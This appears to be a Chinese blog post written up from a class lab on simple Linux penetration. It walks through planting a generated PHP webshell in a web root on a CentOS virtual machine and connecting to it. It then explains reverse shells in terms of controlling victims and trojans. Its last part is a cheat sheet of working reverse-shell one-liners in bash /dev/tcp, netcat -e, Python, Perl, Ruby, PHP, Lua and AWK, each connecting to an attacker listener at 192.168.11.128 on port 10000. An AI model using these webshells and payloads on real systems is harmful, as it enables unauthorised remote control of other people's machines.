linux|Linux简单渗透、反弹shell、常见脚本反弹方法运维|centos

Linux简单渗透这是我在课堂上做的一个小实验，首先电脑要有Java软件，没有去电脑管家下载一个，用于后期渗透。

文章图片

第一步：打开软件点击管理，会出现让我们生成的界面，密码、密钥可以改，自己记住就行，这里我用的默认，有效载荷更具自己需求更改，这里我用的php，然后点击生成。

文章图片

第二步：点击生成后会让我们选择一个存放文件地址，更具自己想放那放那，然后会在存放文件里生成一个php文件，右击我们用notepad++（这里我用的是notepad++）打开可以看到文件里的内容。

文章图片

文章图片

第三步：把刚才创好的php文件移动到我们的虚拟机（这里我用的centos，我用的FinalShell把php移到虚拟机里），我们需要将php文件移动到/var/www/html/这个目录下。

文章图片

第四步：去网页访问自己的虚拟IP地址加端口号（端口号看自己的端口是多少，默认是80，端口号后面加刚才我们命名的那个php文件），访问之后页面是全白就对了，啥都没有。

文章图片

第五步：点击目标添加，自己需要改的更具下面图片去修改相应的内容。

文章图片

第六步：修改完成后我们先点击测试连接，看是否会成功连接，如果连接成功我们在点添加。（左边是连接成功的提示；右边是添加成功的提示）。

文章图片

第七步：添加成功后会出现下面的一行内容。

文章图片

第八步：我们右击这一行内容，然后点进入，如果出现下面界面，说明我们已经渗透成功了

文章图片

文章图片

【linux|Linux简单渗透、反弹shell、常见脚本反弹方法】 补充：连接云服务器（这里我没有云服务器，所以访问centos，成功进入）

文章图片

什么是反弹shell？反弹shell（reverse shell），就是控制端监听在某TCP/UDP端口，被控端发起请求到该端口，并将其命令行的输入输出转到控制端。reverse shell与telnet，ssh等标准shell对应，本质上是网络概念的客户端与服务端的角色反转。
为什么要反弹shell？通常用于被控端因防火墙受限、权限不足、端口被占用等情形。
举例：假设我们攻击了一台机器，打开了该机器的一个端口，攻击者在自己的机器去连接目标机器（目标ip：目标机器端口），这是比较常规的形式，我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。那么什么情况下正向连接不能用了呢？
有如下情况：

某客户机中了你的网马，但是它在局域网内，你直接连接不了。
目标机器的ip动态改变，你不能持续控制。
由于防火墙等限制，对方机器只能发送请求，不能接收请求。
对于病毒，木马，受害者什么时候能中招，对方的网络环境是什么样的，什么时候开关机等情况都是未知的，所以建立一个服务端让恶意程序主动连接，才是上策。

那么反弹就很好理解了，攻击者指定服务端，受害者主机主动连接攻击者的服务端程序，就叫反弹连接。
0x01.bash 在攻击主机上执行端口监听：nc -lvvp port//port 为攻击主机端口号，并且此端口号没有被占用
在目标主机上执行：bash -i >& /dev/tcp/攻击主机ip/port 0>&1//port 为攻击主机端口号
nc -lvvp port（10000）//kali 上执行这条命令
bash -i >& /dev/tcp/攻击主机ip/10000 0>&1//centos 上执行这条命令

文章图片

反弹成功会出现上面情况，当输入ifconfig/whoami会出现被攻击的信息
0x02.nc（netcat）反弹在攻击主机上执行端口监听：nc -lvvp port//port 为攻击主机端口号，并且此端口号没有被占用
在目标主机上执行：nc -e /bin/bash 攻击主机ip port
nc -lvvp 10000//kali上执行
nc -e /bin/bash 192.168.11.128 10000//centsos上执行

文章图片

常见脚本反弹以上脚本是在目标主机上执行，其中 x.x.x.x 均为攻击主机ip，并且需要提前在攻击主机上进行监听相关端口,接下来就不再赘述
1.python nc -lvvp 10000
python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("192.168.11.128",10000)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/bash","-i"]); '

文章图片

2.perl nc -lvvp 10000
perl -e '
use Socket;
$i="192.168.11.128";
$p=10000;
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");
open(STDOUT,">&S"); open(STDERR,">&S");
exec("/bin/sh -i"); }; '

文章图片

3.Ruby nc -lvvp 10000
ruby -rsocket -e 'exit if fork; c=TCPSocket.new("192.168.11.128","10000"); while(cmd=c.gets); IO.popen(cmd,"r"){|io|c.print io.read}end'

文章图片

4.PHP nc -lvvp 10000
php -r '$sock=fsockopen("192.168.11.128",10000); exec("/bin/bash -i <&3 >&3 2>&3"); '

文章图片

文章图片

5.Lua （这个不一定成功）
nc -lvvp 10000
lua -e "require('socket'); require('os'); t=socket.tcp(); t:connect('192.168.11.128','10000'); os.execute('/bin/sh -i <&3 >&3 2>&3'); "

文章图片

6.AWK反弹攻击的机器监听，在收到shell的时候不可以输入enter，不然会断开
nc -lvvp 10000
awk 'BEGIN{s="/inet/tcp/0/192.168.11.128/10000"; for(; s|&getline c; close(c))while(c|getline)print|&s; close(s)}'